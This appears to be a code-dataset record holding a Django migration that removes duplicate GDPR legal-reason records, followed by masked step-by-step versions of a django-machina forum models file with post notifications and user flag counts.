u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'
).distinct()
for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):
remove_duplicate_legal_reasons_relatives(apps,
legal_reason_related_object[u'legal_reason'],
legal_reason_related_object[u'object_content_type'],
legal_reason_related_object[u'object_id'])
class Migration(migrations.Migration):
dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',
u'0002_remove_content_type_name')]
operations = [migrations.AlterField(model_name=u'legalreason', name=
u'purpose_slug', field=models.CharField(choices=[], db_index=True,
max_length=100, verbose_name=u'purpose')), migrations.AlterField(
model_name=u'legalreason', name=u'source_object_id', field=models.
TextField(verbose_name=u'source object ID', db_index=True)),
migrations.AlterField(model_name=u'legalreasonrelatedobject', name=
u'object_id', field=models.TextField(verbose_name=
u'related object ID', db_index=True)), migrations.RunPython(
check_uniqueness_and_keep_latest_active_legal_reason), migrations.
RunPython(
check_uniqueness_and_keep_latest_active_legal_reason_related_object)]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-12-19 15:17
from __future__ import absolute_import
from __future__ import unicode_literals
from django.db import migrations, models
from django.db.models import Count
from tqdm import tqdm
def remove_duplicate_legal_reasons(apps, purpose_slug, source_object_content_type, source_object_id):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
duplicate_legal_reason_qs = LegalReason.objects.filter(
purpose_slug=purpose_slug,
source_object_content_type=source_object_content_type,
source_object_id=source_object_id
)
if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
duplicate_legal_reason_qs.filter(is_active=False).delete()
latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
check_qs = LegalReason.objects.values(u'purpose_slug', u'source_object_content_type', u'source_object_id').annotate(
lr_count=Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count').distinct()
for legal_reason in tqdm(check_qs.all()):
remove_duplicate_legal_reasons(
apps, legal_reason[u'purpose_slug'], legal_reason[u'source_object_content_type'],
legal_reason[u'source_object_id']
)
def remove_duplicate_legal_reasons_relatives(apps, legal_reason, object_content_type, object_id):
LegalReasonRelatedObject = apps.get_model(u'gdpr', u'LegalReasonRelatedObject')
duplicates_qs = LegalReasonRelatedObject.objects.filter(
legal_reason=legal_reason,
object_content_type=object_content_type,
object_id=object_id
)
latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')
duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps, schema_editor):
LegalReasonRelatedObject = apps.get_model(u'gdpr', u'LegalReasonRelatedObject')
check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason', u'object_content_type', u'object_id').annotate(
lrro_count=Count(u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count').distinct()
for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):
remove_duplicate_legal_reasons_relatives(apps, legal_reason_related_object[u'legal_reason'],
legal_reason_related_object[u'object_content_type'],
legal_reason_related_object[u'object_id']
)
class Migration(migrations.Migration):
dependencies = [
(u'gdpr', u'0002_auto_20180509_1518'),
(u'contenttypes', u'0002_remove_content_type_name'),
]
operations = [
migrations.AlterField(
model_name=u'legalreason',
name=u'purpose_slug',
field=models.CharField(choices=[], db_index=True,
max_length=100, verbose_name=u'purpose'),
),
migrations.AlterField(
model_name=u'legalreason',
name=u'source_object_id',
field=models.TextField(verbose_name=u'source object ID', db_index=True),
),
migrations.AlterField(
model_name=u'legalreasonrelatedobject',
name=u'object_id',
field=models.TextField(verbose_name=u'related object ID', db_index=True),
),
migrations.RunPython(check_uniqueness_and_keep_latest_active_legal_reason),
migrations.RunPython(check_uniqueness_and_keep_latest_active_legal_reason_related_object),
]
|
flexible
|
{
"blob_id": "6c86b4823756853bb502b34492ac8ad0a75daf7e",
"index": 7036,
"step-1": "<mask token>\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug,\n source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=\n purpose_slug, source_object_content_type=source_object_content_type,\n source_object_id=source_object_id)\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\n<mask token>\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,\n schema_editor):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',\n u'object_content_type', u'object_id').annotate(lrro_count=Count(\n u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'\n ).distinct()\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps,\n legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id'])\n\n\nclass Migration(migrations.Migration):\n dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',\n u'0002_remove_content_type_name')]\n operations = [migrations.AlterField(model_name=u'legalreason', name=\n u'purpose_slug', field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose')), migrations.AlterField(\n model_name=u'legalreason', name=u'source_object_id', field=models.\n TextField(verbose_name=u'source object ID', db_index=True)),\n migrations.AlterField(model_name=u'legalreasonrelatedobject', name=\n u'object_id', field=models.TextField(verbose_name=\n u'related object ID', db_index=True)), migrations.RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason), migrations.\n RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason_related_object)]\n",
"step-2": "<mask token>\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug,\n source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=\n purpose_slug, source_object_content_type=source_object_content_type,\n source_object_id=source_object_id)\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\n<mask token>\n\n\ndef remove_duplicate_legal_reasons_relatives(apps, legal_reason,\n object_content_type, object_id):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=\n legal_reason, object_content_type=object_content_type, object_id=\n object_id)\n latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')\n duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,\n schema_editor):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',\n u'object_content_type', u'object_id').annotate(lrro_count=Count(\n u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'\n ).distinct()\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps,\n legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id'])\n\n\nclass Migration(migrations.Migration):\n dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',\n u'0002_remove_content_type_name')]\n operations = [migrations.AlterField(model_name=u'legalreason', name=\n u'purpose_slug', field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose')), migrations.AlterField(\n model_name=u'legalreason', name=u'source_object_id', field=models.\n TextField(verbose_name=u'source object ID', db_index=True)),\n migrations.AlterField(model_name=u'legalreasonrelatedobject', name=\n u'object_id', field=models.TextField(verbose_name=\n u'related object ID', db_index=True)), migrations.RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason), migrations.\n RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason_related_object)]\n",
"step-3": "<mask token>\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug,\n source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=\n purpose_slug, source_object_content_type=source_object_content_type,\n source_object_id=source_object_id)\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n check_qs = LegalReason.objects.values(u'purpose_slug',\n u'source_object_content_type', u'source_object_id').annotate(lr_count\n =Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count'\n ).distinct()\n for legal_reason in tqdm(check_qs.all()):\n remove_duplicate_legal_reasons(apps, legal_reason[u'purpose_slug'],\n legal_reason[u'source_object_content_type'], legal_reason[\n u'source_object_id'])\n\n\ndef remove_duplicate_legal_reasons_relatives(apps, legal_reason,\n object_content_type, object_id):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=\n legal_reason, object_content_type=object_content_type, object_id=\n object_id)\n latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')\n duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,\n schema_editor):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',\n u'object_content_type', u'object_id').annotate(lrro_count=Count(\n u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'\n ).distinct()\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps,\n legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id'])\n\n\nclass Migration(migrations.Migration):\n dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',\n u'0002_remove_content_type_name')]\n operations = [migrations.AlterField(model_name=u'legalreason', name=\n u'purpose_slug', field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose')), migrations.AlterField(\n model_name=u'legalreason', name=u'source_object_id', field=models.\n TextField(verbose_name=u'source object ID', db_index=True)),\n migrations.AlterField(model_name=u'legalreasonrelatedobject', name=\n u'object_id', field=models.TextField(verbose_name=\n u'related object ID', db_index=True)), migrations.RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason), migrations.\n RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason_related_object)]\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom django.db import migrations, models\nfrom django.db.models import Count\nfrom tqdm import tqdm\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug,\n source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=\n purpose_slug, source_object_content_type=source_object_content_type,\n source_object_id=source_object_id)\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n check_qs = LegalReason.objects.values(u'purpose_slug',\n u'source_object_content_type', u'source_object_id').annotate(lr_count\n =Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count'\n ).distinct()\n for legal_reason in tqdm(check_qs.all()):\n remove_duplicate_legal_reasons(apps, legal_reason[u'purpose_slug'],\n legal_reason[u'source_object_content_type'], legal_reason[\n u'source_object_id'])\n\n\ndef remove_duplicate_legal_reasons_relatives(apps, legal_reason,\n object_content_type, object_id):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=\n legal_reason, object_content_type=object_content_type, object_id=\n object_id)\n latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')\n duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,\n schema_editor):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',\n u'object_content_type', u'object_id').annotate(lrro_count=Count(\n u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'\n ).distinct()\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps,\n legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id'])\n\n\nclass Migration(migrations.Migration):\n dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',\n u'0002_remove_content_type_name')]\n operations = [migrations.AlterField(model_name=u'legalreason', name=\n u'purpose_slug', field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose')), migrations.AlterField(\n model_name=u'legalreason', name=u'source_object_id', field=models.\n TextField(verbose_name=u'source object ID', db_index=True)),\n migrations.AlterField(model_name=u'legalreasonrelatedobject', name=\n u'object_id', field=models.TextField(verbose_name=\n u'related object ID', db_index=True)), migrations.RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason), migrations.\n RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason_related_object)]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.16 on 2018-12-19 15:17\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.db.models import Count\nfrom tqdm import tqdm\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug, source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(\n purpose_slug=purpose_slug,\n source_object_content_type=source_object_content_type,\n source_object_id=source_object_id\n )\n\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n check_qs = LegalReason.objects.values(u'purpose_slug', u'source_object_content_type', u'source_object_id').annotate(\n lr_count=Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count').distinct()\n\n for legal_reason in tqdm(check_qs.all()):\n remove_duplicate_legal_reasons(\n apps, legal_reason[u'purpose_slug'], legal_reason[u'source_object_content_type'],\n legal_reason[u'source_object_id']\n )\n\n\ndef remove_duplicate_legal_reasons_relatives(apps, legal_reason, object_content_type, object_id):\n LegalReasonRelatedObject = apps.get_model(u'gdpr', u'LegalReasonRelatedObject')\n duplicates_qs = LegalReasonRelatedObject.objects.filter(\n legal_reason=legal_reason,\n object_content_type=object_content_type,\n object_id=object_id\n )\n latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')\n duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps, schema_editor):\n LegalReasonRelatedObject = apps.get_model(u'gdpr', u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason', u'object_content_type', u'object_id').annotate(\n lrro_count=Count(u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count').distinct()\n\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps, legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id']\n )\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (u'gdpr', u'0002_auto_20180509_1518'),\n (u'contenttypes', u'0002_remove_content_type_name'),\n ]\n operations = [\n migrations.AlterField(\n model_name=u'legalreason',\n name=u'purpose_slug',\n field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose'),\n ),\n migrations.AlterField(\n model_name=u'legalreason',\n name=u'source_object_id',\n field=models.TextField(verbose_name=u'source object ID', db_index=True),\n ),\n migrations.AlterField(\n model_name=u'legalreasonrelatedobject',\n name=u'object_id',\n field=models.TextField(verbose_name=u'related object ID', db_index=True),\n ),\n migrations.RunPython(check_uniqueness_and_keep_latest_active_legal_reason),\n migrations.RunPython(check_uniqueness_and_keep_latest_active_legal_reason_related_object),\n ]\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self
.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.
topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content=
'Flag updates on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content=
'Vote update on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),
editable=False, blank=True, default=0)
<|reserved_special_token_0|>
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = 'You have a new notification'
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance
.topic.forum.slug, instance.topic.forum.id, instance.topic.slug,
instance.topic.id, instance.id, instance.id)
if created:
notification_content = ('A new post was created on your topic {}'.
format(instance.topic.slug))
else:
notification_content = ("A post's contetn was edited on your topic {}"
.format(instance.topic.slug))
n = UserNotification(user=user, notification_link=notification_link,
notification_content=notification_content)
n.save()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self
.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.
topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content=
'Flag updates on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content=
'Vote update on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),
editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
if created:
Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = 'You have a new notification'
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance
.topic.forum.slug, instance.topic.forum.id, instance.topic.slug,
instance.topic.id, instance.id, instance.id)
if created:
notification_content = ('A new post was created on your topic {}'.
format(instance.topic.slug))
else:
notification_content = ("A post's contetn was edited on your topic {}"
.format(instance.topic.slug))
n = UserNotification(user=user, notification_link=notification_link,
notification_content=notification_content)
n.save()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
Topic = model_factory(AbstractTopic)
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self
.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.
topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content=
'Flag updates on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content=
'Vote update on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),
editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
if created:
Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = 'You have a new notification'
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance
.topic.forum.slug, instance.topic.forum.id, instance.topic.slug,
instance.topic.id, instance.id, instance.id)
if created:
notification_content = ('A new post was created on your topic {}'.
format(instance.topic.slug))
else:
notification_content = ("A post's contetn was edited on your topic {}"
.format(instance.topic.slug))
n = UserNotification(user=user, notification_link=notification_link,
notification_content=notification_content)
n.save()
<|reserved_special_token_1|>
from __future__ import unicode_literals
from machina.apps.forum_conversation.abstract_models import AbstractPost
from machina.apps.forum_conversation.abstract_models import AbstractTopic
from machina.core.db.models import model_factory
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
Topic = model_factory(AbstractTopic)
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self
.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.
topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content=
'Flag updates on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content=
'Vote update on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),
editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
if created:
Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = 'You have a new notification'
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance
.topic.forum.slug, instance.topic.forum.id, instance.topic.slug,
instance.topic.id, instance.id, instance.id)
if created:
notification_content = ('A new post was created on your topic {}'.
format(instance.topic.slug))
else:
notification_content = ("A post's contetn was edited on your topic {}"
.format(instance.topic.slug))
n = UserNotification(user=user, notification_link=notification_link,
notification_content=notification_content)
n.save()
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from machina.apps.forum_conversation.abstract_models import AbstractPost
from machina.apps.forum_conversation.abstract_models import AbstractTopic
from machina.core.db.models import model_factory
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
Topic = model_factory(AbstractTopic)
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = "/forum/{}-{}/topic/{}-{}/?post={}#{}".format(self.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content="Flag updates on post {}".format(self.subject), notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content="Vote update on post {}".format(self.subject), notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(
verbose_name=_('Flag count'), editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
if created:
Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = "You have a new notification"
notification_link = "/forum/{}-{}/topic/{}-{}/?post={}#{}".format(instance.topic.forum.slug, instance.topic.forum.id, instance.topic.slug, instance.topic.id, instance.id, instance.id)
if created:
notification_content = "A new post was created on your topic {}".format(instance.topic.slug)
else:
notification_content = "A post's contetn was edited on your topic {}".format(instance.topic.slug)
n = UserNotification(user=user, notification_link=notification_link, notification_content=notification_content)
n.save()
|
flexible
|
{
"blob_id": "1e81e0f3cb2fb25fdef08a913aa1ff77d0c2a562",
"index": 9204,
"step-1": "<mask token>\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self\n .topic.forum.slug, self.topic.forum.id, self.topic.slug, self.\n topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Flag updates on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Vote update on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),\n editable=False, blank=True, default=0)\n\n\n<mask token>\n\n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n 